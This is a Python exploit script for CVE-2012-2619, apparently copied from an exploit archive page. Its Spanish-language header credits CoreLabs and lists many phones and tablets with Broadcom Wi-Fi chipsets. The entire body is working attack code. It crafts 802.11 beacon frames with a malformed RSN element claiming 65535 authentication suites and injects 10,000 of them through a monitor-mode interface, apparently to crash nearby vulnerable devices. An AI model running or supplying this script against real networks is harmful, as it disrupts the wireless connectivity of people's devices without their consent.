107 lines
No EOL
3 KiB
Python
Executable file
107 lines
No EOL
3 KiB
Python
Executable file
# Exploit Author:
|
|
CoreLabs (Core Security Technologies) fue descubierta por el
|
|
investigador argentino Andrés Blanco,
|
|
# Vendor Homepage:
|
|
# Software Link: [download link if available]
|
|
# Version: 1.0
|
|
# Tested on:
|
|
Apple iPhone 3GS
|
|
Apple iPod 2G
|
|
HTC Touch Pro 2
|
|
HTC Droid Incredible
|
|
Samsung Spica
|
|
Acer Liquid
|
|
Motorola Devour
|
|
Vehículo Ford Edge
|
|
Dispositivos afectados con el chipset BCM4329:
|
|
Apple iPhone 4
|
|
Apple iPhone 4 Verizon
|
|
Apple iPod 3G
|
|
Apple iPad Wi-Fi
|
|
Apple iPad 3G
|
|
Apple iPad 2
|
|
Apple Tv 2G
|
|
Motorola Xoom
|
|
Motorola Droid X2
|
|
Motorola Atrix
|
|
Samsung Galaxy Tab
|
|
Samsung Galaxy S 4G
|
|
Samsung Nexus S
|
|
Samsung Stratosphere
|
|
Samsung Fascinate
|
|
HTC Nexus One
|
|
HTC Evo 4G
|
|
HTC ThunderBolt
|
|
HTC Droid Incredible 2
|
|
LG Revolution
|
|
Sony Ericsson Xperia Play
|
|
Pantech Breakout
|
|
Nokia Lumina 800
|
|
Kyocera Echo
|
|
Asus Transformer Prime
|
|
Malata ZPad"
|
|
|
|
# CVE : 2012-2619
|
|
#!/usr/bin/env python
|
|
|
|
import sys
|
|
import time
|
|
import struct
|
|
import PyLorcon2
|
|
|
|
def beaconFrameGenerator():
|
|
sequence = 0
|
|
while(1):
|
|
sequence = sequence % 4096
|
|
|
|
# Frame Control
|
|
frame = '\x80' # Version: 0 - Type: Managment - Subtype: Beacon
|
|
frame += '\x00' # Flags: 0
|
|
frame += '\x00\x00' # Duration: 0
|
|
frame += '\xff\xff\xff\xff\xff\xff' # Destination: ff:ff:ff:ff:ff:ff
|
|
frame += '\x00\x00\x00\x15\xde\xad' # Source: 00:00:00:15:de:ad
|
|
frame += '\x00\x00\x00\x15\xde\xad' # BSSID: 00:00:00:15:de:ad
|
|
frame += struct.pack('H', sequence) # Fragment: 0 - Sequenence:
|
|
#part of the generator
|
|
# Frame Body
|
|
frame += struct.pack('Q', time.time()) # Timestamp
|
|
frame += '\x64\x00' # Beacon Interval: 0.102400 seconds
|
|
frame += '\x11\x04' # Capability Information: ESS, Privacy,
|
|
#Short Slot time
|
|
# Information Elements
|
|
# SSID: buggy
|
|
frame += '\x00\x05buggy'
|
|
# Supported Rates: 1,2,5.5,11,18,24,36,54
|
|
frame += '\x01\x08\x82\x84\x8b\x96\x24\x30\x48\x6c'
|
|
# DS Parameter Set: 6
|
|
frame += '\x03\x01\x06'
|
|
# RSN IE
|
|
frame += '\x30' # ID: 48
|
|
frame += '\x14' # Size: 20
|
|
frame += '\x01\x00' # Version: 1
|
|
frame += '\x00\x0f\xac\x04' # Group cipher suite: TKIP
|
|
frame += '\x01\x00' # Pairwise cipher suite count: 1
|
|
frame += '\x00\x0f\xac\x00' # Pairwise cipher suite 1: TKIP
|
|
frame += '\xff\xff' # Authentication suites count: 65535
|
|
frame += '\x00\x0f\xac\x02' # Pairwise authentication suite 2: PSK
|
|
frame += '\x00\x00'
|
|
|
|
sequence += 1
|
|
yield frame
|
|
|
|
if __name__ == "__main__":
|
|
if len(sys.argv) != 2:
|
|
print "Usage:"
|
|
print "\t%s <wireless interface>" % sys.argv[0]
|
|
sys.exit(-1)
|
|
|
|
iface = sys.argv[1]
|
|
context = PyLorcon2.Context(iface)
|
|
context.open_injmon()
|
|
|
|
generator = beaconFrameGenerator()
|
|
|
|
for i in range(10000):
|
|
frame = generator.next()
|
|
time.sleep(0.100)
|
|
context.send_bytes(frame) |